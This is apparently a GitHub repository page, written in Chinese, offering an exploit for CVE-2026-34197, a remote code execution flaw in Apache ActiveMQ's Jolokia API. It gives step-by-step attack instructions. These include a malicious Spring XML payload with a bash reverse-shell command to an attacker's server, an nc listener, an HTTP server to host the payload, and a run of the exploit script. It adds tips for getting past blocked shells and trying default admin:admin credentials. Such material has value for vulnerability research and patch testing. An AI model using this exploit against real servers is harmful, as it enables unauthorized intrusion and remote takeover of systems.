xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-
GitHub: xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-
该仓库提供 Apache ActiveMQ Jolokia RCE 漏洞的复现脚本与载荷,帮助理解漏洞触发条件与利用链。
Stars: 1 | Forks: 0
# ActiveMQ Jolokia RCE 漏洞复现指南
本仓库提供了一个基于 Apache ActiveMQ 暴露的 Jolokia API 接口(`/api/jolokia/`)的远程代码执行 (RCE) 漏洞复现环境和利用脚本。
通过调用 `addNetworkConnector` 操作,强制 ActiveMQ 解析恶意构造的远程 Spring XML 配置文件,从而利用 `MethodInvokingFactoryBean` 执行系统命令。
## 📁 包含文件
* **`payload.py`**: 利用主脚本,发送带有动态 Broker 名称的 HTTP POST 请求。
* **`payload.xml`**: 恶意的 Spring Bean 配置文件,内部包含反弹 Shell 的命令载荷。
## 🛠️ 环境准备
1. **Python 3** 环境
2. 安装依赖:
pip install requests
3. **攻击机(如云服务器)**:需要具备公网 IP,能够开放 HTTP 服务端口和反弹 Shell 的监听端口。
4. **目标机**:存在漏洞的 ActiveMQ 服务(如 `apache/activemq-classic:6.1.0` Docker 镜像)。
## 🚀 复现步骤
### 1. 配置攻击载荷 (`payload.xml`)
在攻击机上打开 `payload.xml`,找到以下部分:
bash -c 'bash -i >& /dev/tcp/您的云服务器IP/15000 0>&1'
将其中的 IP 替换为您的云服务器公网 IP。如果目标环境中没有 `bash`,请根据目标环境情况更改为 `sh` 或其他执行方式。
### 2. 开启反弹 Shell 监听
在攻击机(云服务器)上开启一个终端,监听指定的端口(例如 `15000`):
nc -lvvp 15000
### 3. 开启 HTTP 服务托管载荷
在攻击机上(与 `payload.xml` 同级的目录),开启一个 HTTP 服务器以供目标下载 XML 文件:
python3 -m http.server 9000
### 4. 执行漏洞利用脚本
在本地机器(或攻击机)上运行 `payload.py`。
脚本支持通过命令行参数传入目标 ActiveMQ 的 IP:端口 (`-t`) 和攻击机托管 XML 的 IP:端口 (`-a`)。
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000
运行后,脚本会自动生成一个随机的 `brokerName`(例如 `rce_a1b2c3`),以彻底解决 `java.io.IOException : Network Connector could not be registered in JMX` 的名称冲突报错问题。
### 5. 获得 Shell
如果利用成功:
1. 您的 HTTP 服务端(`python3 -m http.server 9000`)会看到一条对 `/payload.xml` 的 `GET 200` 请求记录。
2. 您的 `nc` 监听端将收到来自目标机器的反弹 Shell 连接。
## ⚠️ 常见问题排查
1. **成功获取 XML(HTTP 200),但没收到 Shell**:
* *原因A*:云服务器安全组拦截了反弹的 Shell(入站流量未放行 15000 端口)。
* *原因B*:目标容器内没有 `/bin/bash` 命令(常见于 Alpine 等精简基础镜像)。请将 `payload.xml` 中的执行命令修改为 `/bin/sh`,或者通过 `wget/curl` 落地脚本再执行。
2. **目标报错 401 Unauthorized**:
* *原因*:高版本的 ActiveMQ / Jolokia 接口需要提供账号密码认证。
* *解决*:如果是默认凭据,可以在请求中加上 Basic Auth(如 `admin:admin`)。
## 🛡️ 免责声明
本脚本和说明仅供授权的安全测试和教育学习使用。严禁用于任何未经授权的非法测试。使用者需对自身的行为负责。
标签:ActiveMQ, Apache ActiveMQ, API 滥用, Broker 名称绕过, CVE, DevOps 安全, HTTP POST, HTTP 文件托管, Jolokia, MethodInvokingFactoryBean, RCE, Spring XML 注入, Spring 框架, T1059, T1068, T1078, Web报告查看器, XML 外部实体, 动态配置注入, 反弹Shell, 反弹Shell监听, 命令执行, 命令注入, 攻击载荷, 数字签名, 数据展示, 消息中间件漏洞, 漏洞复现, 红队, 编程工具, 网络代理添加, 远程代码执行, 逆向工具